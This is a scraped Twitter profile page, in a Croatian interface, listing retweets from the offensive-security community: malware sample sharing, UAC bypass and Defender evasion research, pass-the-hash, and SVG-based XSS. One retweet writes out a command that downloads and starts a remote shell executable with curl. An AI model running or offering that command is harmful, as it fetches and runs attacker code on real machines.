b00n

@b00n10

it took me 3 days in total and 32 reinstalls

Vrijeme pridruživanja: listopad 2018.

Tweetovi

Blokirali ste korisnika/cu @b00n10

Jeste li sigurni da želite vidjeti te tweetove? Time nećete deblokirati korisnika/cu @b00n10

  1. proslijedio/la je Tweet
    28. sij

    .exe is the new .exe  -   Affected systems - Windows 10 build 17063 and Later curl -O http://192.168.191.1/shell191.exe & start shell191.exe More info -

    Prikaži ovu nit
    Poništi
  2. proslijedio/la je Tweet
    26. sij

    The claim in the FTI forensics report on Bezos’ iPhone that, “due to end-to-end encryption employed by WhatsApp, it is virtually impossible to decrypt the contents of the downloader [.enc file]...” bugged me so much that I coded up how to do it:

    Prikaži ovu nit
    Poništi
  3. proslijedio/la je Tweet
    21. sij

    Friends, It has come to our attention a company is selling our malware samples. VXUG will never charge for it's data. Our current collection boasts a healthy 443,703 samples. New blocks of 20,000 added weekly. Free of charge. No IP logs. No cookies.

    Poništi
  4. proslijedio/la je Tweet

    There's a website for testing the NSA crypto thing, if you can open it without certificate warnings you may want to apply January 2020's Windows patches. Note this is difficult to scale for MITM interception due to number of systems it doesn't work on.

    Prikaži ovu nit
    Poništi
  5. proslijedio/la je Tweet

    Some of the biggest and most costly breaches in recent memory caused by 20 year old security bugs in security products by security vendors: - Fortigate SSL VPN. - Citrix ADC (SSL VPN). - Pulse Secure (SSL VPN). In each case they all lacked basic security mitigations.

    Prikaži ovu nit
    Poništi
  6. proslijedio/la je Tweet
    28. pro 2019.

    New article about "Pass the hash" This technique is used in a lot of engagements, and yet it is not always fully understood. This is a little review of one of the most popular lateral movement techniques 🙃

    Poništi
  7. proslijedio/la je Tweet
    1. sij

    New year, new merch - shipped with every radare2 pro license. Be like and get yours now!

    Poništi
  8. proslijedio/la je Tweet
    30. pro 2019.

    look at that Seniority level:

    Prikaži ovu nit
    Poništi
  9. proslijedio/la je Tweet
    26. pro 2019.

    Friends, In the past 30 days we have: -Consumed just over 3TBs of web traffic -Ducked 3 DDoS attacks -Gotten over 600 new followers -Added approx. 20,000 malware samples -4 Papers -1 full ezine -Made 'impressions' on over 251,000 people -Grown 2020 will be a good year for VX.

    Poništi
  10. proslijedio/la je Tweet
    Poništi
  11. proslijedio/la je Tweet
    8. pro 2019.

    you can UAC bypass all executable files which are autoelevate true base on my first article. UAC Bypass All the things POCs: sample: Bluetooth uninstall device task (UAC Bypass to administrator)

    Poništi
  12. proslijedio/la je Tweet
    2. pro 2019.

    A little research from and me on how to evade WinDefender ATP credential-theft

    Poništi
  13. proslijedio/la je Tweet
    30. stu 2019.

    Spotify: hey dumbass. hey asshole. Me: pls don’t Spotify: here’s your 2019 Rewind playlist you bitch Me: stop Spotify: and we pulled every fucken song from that one 6 week period after a breakup Me: *already listening to the playlist, crying* it’s perfect. i hate you.

    Poništi
  14. proslijedio/la je Tweet
    27. stu 2019.

    Check if a server is running any vulnerable services wget https://raw.githubusercontent(.)com/vulnersCom/nmap-vulners/master/vulners.nse -O /usr/share/nmap/scripts/vulners.nse && nmap --script-updatedb All done, now you can do a scan with nmap -sV --script vulners <target>

    Prikaži ovu nit
    Poništi
  15. Poništi
  16. proslijedio/la je Tweet
    25. stu 2019.

    Want to classify process injection by Windows API calls? Check out the new poster made by and me!

    Poništi
  17. proslijedio/la je Tweet

    Well, since didn't find my bug report to be worth rewarding or fixing anytime soon, I figured I'd drop the blog. Hoping Red Teams can enjoy using this technique to bypass Protected View in Office documents! 📄🎣

    Prikaži ovu nit
    Poništi
  18. proslijedio/la je Tweet
    Poništi
  19. proslijedio/la je Tweet
    23. lis 2019.

    NOTICE THIS TWEET : recommended configuration for nextcloud with nginx and php-fpm is vulnerable...

    Poništi
  20. proslijedio/la je Tweet
    7. lis 2019.

    XSS using Image file SVG 1. SVG files can be treated as images in HTML 2. SVG files also support inline javascript code 3. website loads a SVG file with an XSS payload it will get executed

    Prikaži ovu nit
    Poništi

Čini se da učitavanje traje već neko vrijeme.

Twitter je možda preopterećen ili ima kratkotrajnih poteškoća u radu. Pokušajte ponovno ili potražite dodatne informacije u odjeljku Status Twittera.

    Možda bi vam se svidjelo i ovo:

    ·